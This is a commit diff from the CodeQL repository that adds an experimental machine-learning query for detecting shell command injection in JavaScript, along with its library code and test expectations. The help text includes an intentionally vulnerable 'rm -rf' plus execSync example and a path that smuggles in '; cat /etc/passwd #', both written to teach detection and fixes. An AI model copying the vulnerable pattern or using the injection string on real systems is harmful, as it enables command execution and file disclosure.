hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-04-29 18:55:14 +02:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into js-use-shared-cryptography

Browse Source
This commit is contained in:
Alex Ford
2023-02-03 15:18:30 +00:00
committed by GitHub
parent 6c35feaa98 b8bd98e476
commit 7768026e70
858 changed files with 237441 additions and 19245 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointCharacteristics.qll
View File

@@ -278,6 +278,28 @@ private class NosqlInjectionSinkCharacteristic extends EndpointCharacteristic {
}
}
/**
* Endpoints identified as "ShellCommandInjectionFromEnvironmentSink" by the standard JavaScript libraries are
* ShellCommandInjectionFromEnvironment sinks with maximal confidence.
*/
private class ShellCommandInjectionFromEnvironmentSinkCharacteristic extends EndpointCharacteristic {
ShellCommandInjectionFromEnvironmentSinkCharacteristic() {
this = "ShellCommandInjectionFromEnvironmentSink"
}
override predicate appliesToEndpoint(DataFlow::Node n) {
n instanceof ShellCommandInjectionFromEnvironment::Sink
}
override predicate hasImplications(
EndpointType endpointClass, boolean isPositiveIndicator, float confidence
) {
endpointClass instanceof ShellCommandInjectionFromEnvironmentSinkType and
isPositiveIndicator = true and
confidence = maximalConfidence()
}
}
/*
* Characteristics that are indicative of not being a sink of any type, and have historically been used to select
* negative samples for training.

11
javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointTypes.qll
View File

@@ -10,7 +10,8 @@ newtype TEndpointType =
TXssSinkType() or
TNosqlInjectionSinkType() or
TSqlInjectionSinkType() or
TTaintedPathSinkType()
TTaintedPathSinkType() or
TShellCommandInjectionFromEnvironmentSinkType()
/** A class that can be predicted by endpoint scoring models. */
abstract class EndpointType extends TEndpointType {
@@ -60,3 +61,11 @@ class TaintedPathSinkType extends EndpointType, TTaintedPathSinkType {
override int getEncoding() { result = 4 }
}
/** The `ShellCommandInjectionFromEnvironmentSink` class that can be predicted by endpoint scoring models. */
class ShellCommandInjectionFromEnvironmentSinkType extends EndpointType,
TShellCommandInjectionFromEnvironmentSinkType {
override string getDescription() { result = "ShellCommandInjectionFromEnvironmentSink" }
override int getEncoding() { result = 5 }
}

30
javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/ShellCommandInjectionFromEnvironmentATM.qll Normal file
View File

@@ -0,0 +1,30 @@
/**
* For internal use only.
*
* A taint-tracking configuration for reasoning about command-injection
* vulnerabilities.
* Defines shared code used by the ShellCommandInjectionFromEnvironment boosted query.
*/
private import semmle.javascript.heuristics.SyntacticHeuristics
private import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations::ShellCommandInjectionFromEnvironment as ShellCommandInjectionFromEnvironment
import AdaptiveThreatModeling
class ShellCommandInjectionFromEnvironmentAtmConfig extends AtmConfig {
ShellCommandInjectionFromEnvironmentAtmConfig() {
this = "ShellCommandInjectionFromEnvironmentAtmConfig"
}
override predicate isKnownSource(DataFlow::Node source) {
source instanceof ShellCommandInjectionFromEnvironment::Source
}
override EndpointType getASinkEndpointType() {
result instanceof ShellCommandInjectionFromEnvironmentSinkType
}
override predicate isSanitizer(DataFlow::Node node) {
super.isSanitizer(node) or
node instanceof ShellCommandInjectionFromEnvironment::Sanitizer
}
}

2
javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml
View File

@@ -1,6 +1,6 @@
name: codeql/javascript-experimental-atm-lib
description: CodeQL libraries for the experimental ML-powered queries
version: 0.4.6
version: 0.4.7
extractor: javascript
library: true
groups:

6
javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/DebugResultInclusion.ql
View File

@@ -17,6 +17,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) {
query instanceof NosqlInjectionQuery and
@@ -33,6 +34,11 @@ string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) {
or
query instanceof XssThroughDomQuery and
result = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(sinkCandidate)
or
query instanceof ShellCommandInjectionFromEnvironmentQuery and
result =
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(sinkCandidate)
}
pragma[inline]

5
javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointDataTraining.qll
View File

@@ -15,6 +15,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
/**
* Gets the set of featureName-featureValue pairs for each endpoint in the training set.
@@ -217,6 +218,10 @@ DataFlow::Configuration getDataFlowCfg(Query query) {
query instanceof XssQuery and result instanceof XssAtm::DomBasedXssAtmConfig
or
query instanceof XssThroughDomQuery and result instanceof XssThroughDomAtm::XssThroughDomAtmConfig
or
query instanceof ShellCommandInjectionFromEnvironmentQuery and
result instanceof
ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig
}
// TODO: Delete this once we are no longer surfacing `hasFlowFromSource`.

5
javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointMapping.ql
View File

@@ -9,6 +9,7 @@ import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAt
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
import experimental.adaptivethreatmodeling.AdaptiveThreatModeling
from string queryName, AtmConfig c, EndpointType e
@@ -26,6 +27,10 @@ where
queryName = "Xss" and c instanceof XssAtm::DomBasedXssAtmConfig
or
queryName = "XssThroughDom" and c instanceof XssThroughDomAtm::XssThroughDomAtmConfig
or
queryName = "ShellCommandInjectionFromEnvironment" and
c instanceof
ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig
) and
e = c.getASinkEndpointType()
select queryName, e.getEncoding() as label

8
javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/Queries.qll
View File

@@ -9,7 +9,8 @@ newtype TQuery =
TSqlInjectionQuery() or
TTaintedPathQuery() or
TXssQuery() or
TXssThroughDomQuery()
TXssThroughDomQuery() or
TShellCommandInjectionFromEnvironmentQuery()
abstract class Query extends TQuery {
abstract string getName();
@@ -36,3 +37,8 @@ class XssQuery extends Query, TXssQuery {
class XssThroughDomQuery extends Query, TXssThroughDomQuery {
override string getName() { result = "XssThroughDom" }
}
class ShellCommandInjectionFromEnvironmentQuery extends Query,
TShellCommandInjectionFromEnvironmentQuery {
override string getName() { result = "ShellCommandInjectionFromEnvironment" }
}

75
javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.md Normal file
View File

@@ -0,0 +1,75 @@
# Shell command built from environment values (experimental)
Dynamically constructing a shell command with values from the
local environment, such as file paths, may inadvertently
change the meaning of the shell command.
Such changes can occur when an environment value contains
characters that the shell interprets in a special way, for instance
quotes and spaces.
This can result in the shell command misbehaving, or even
allowing a malicious user to execute arbitrary commands on the system.
Note: This CodeQL query is an experimental query. Experimental queries generate alerts using machine learning. They might include more false positives but they will improve over time.
## Recommendation
If possible, use hard-coded string literals to specify the
shell command to run, and provide the dynamic arguments to the shell
command separately to avoid interpretation by the shell.
Alternatively, if the shell command must be constructed
dynamically, then add code to ensure that special characters in
environment values do not alter the shell command unexpectedly.
## Example
The following example shows a dynamically constructed shell
command that recursively removes a temporary directory that is located
next to the currently executing JavaScript file. Such utilities are
often found in custom build scripts.
```javascript
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm -rf " + path.join(__dirname, "temp");
cp.execSync(cmd); // BAD
}
```
The shell command will, however, fail to work as intended if the
absolute path of the script's directory contains spaces. In that
case, the shell command will interpret the absolute path as multiple
paths, instead of a single path.
For instance, if the absolute path of
the temporary directory is "`/home/username/important project/temp`", then the shell command will recursively delete
`"/home/username/important"` and `"project/temp"`,
where the latter path gets resolved relative to the working directory
of the JavaScript process.
Even worse, although less likely, a malicious user could
provide the path `"/home/username/; cat /etc/passwd #/important
project/temp"` in order to execute the command `"cat
/etc/passwd"`.
To avoid such potentially catastrophic behaviors, provide the
directory as an argument that does not get interpreted by a
shell:
```javascript
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm",
args = ["-rf", path.join(__dirname, "temp")];
cp.execFileSync(cmd, args); // GOOD
}
```
## References
* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection)

29
javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.ql Normal file
View File

@@ -0,0 +1,29 @@
/**
* For internal use only.
*
* @name Shell command built from environment values
* @description Building a shell command string with values from the enclosing
* environment may cause subtle bugs or vulnerabilities.
* @kind path-problem
* @scored
* @problem.severity warning
* @security-severity 6.3
* @precision high
* @id js/ml-powered/shell-command-injection-from-environment
* @tags experimental security
* correctness
* security
* external/cwe/cwe-078
* external/cwe/cwe-088
*/
import javascript
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM
import ATM::ResultsInfo
import DataFlow::PathGraph
from AtmConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink, float score
where cfg.hasBoostedFlowPath(source, sink, score)
select sink.getNode(), source, sink,
"(Experimental) This shell command depends on $@. Identified using machine learning.",
source.getNode(), "an uncontrolled value", score

48
javascript/ql/experimental/adaptivethreatmodeling/src/XssThroughDomATM.md Normal file
View File

@@ -0,0 +1,48 @@
# DOM text reinterpreted as HTML (experimental)
Extracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.
A webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.
Note: This CodeQL query is an experimental query. Experimental queries generate alerts using machine learning. They might include more false positives but they will improve over time.
## Recommendation
To guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.
## Example
The following example shows a webpage using a `data-target` attribute
to select and manipulate a DOM element using the JQuery library. In the example, the
`data-target` attribute is read into the `target` variable, and the
`$` function is then supposed to use the `target` variable as a CSS
selector to determine which element should be manipulated.
```javascript
$("button").click(function () {
var target = $(this).attr("data-target");
$(target).hide();
});
```
However, if an attacker can control the `data-target` attribute,
then the value of `target` can be used to cause the `$` function
to execute arbitrary JavaScript.
The above vulnerability can be fixed by using `$.find` instead of `$`.
The `$.find` function will only interpret `target` as a CSS selector
and never as HTML, thereby preventing an XSS attack.
```javascript
$("button").click(function () {
var target = $(this).attr("data-target");
$.find(target).hide();
});
```
## References
* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html)
* OWASP: [(Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)
* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting)
* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting)

2
javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml
View File

@@ -1,7 +1,7 @@
name: codeql/javascript-experimental-atm-queries
description: Experimental ML-powered queries for JavaScript
language: javascript
version: 0.4.6
version: 0.4.7
suites: codeql-suites
defaultSuiteFile: codeql-suites/javascript-atm-code-scanning.qls
groups:

156537
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.expected
View File

File diff suppressed because it is too large Load Diff

5
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.ql
View File

@@ -12,6 +12,7 @@ import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
import experimental.adaptivethreatmodeling.EndpointFeatures as EndpointFeatures
import extraction.NoFeaturizationRestrictionsConfig
private import experimental.adaptivethreatmodeling.EndpointCharacteristics as EndpointCharacteristics
@@ -23,6 +24,10 @@ query predicate tokenFeatures(DataFlow::Node endpoint, string featureName, strin
not exists(any(TaintedPathAtm::TaintedPathAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(any(XssAtm::DomBasedXssAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(endpoint)
) or
any(EndpointCharacteristics::IsArgumentToModeledFunctionCharacteristic characteristic)
.appliesToEndpoint(endpoint)
) and

173
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.expected
View File

@@ -23,6 +23,26 @@
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name |
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name |
@@ -137,6 +157,9 @@
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} |
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:55 | "SELECT ... PRICE" |
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } |
@@ -191,6 +214,114 @@
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url |
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:40:42:40:50 | [req.url] |
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | process.cwd() |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 |
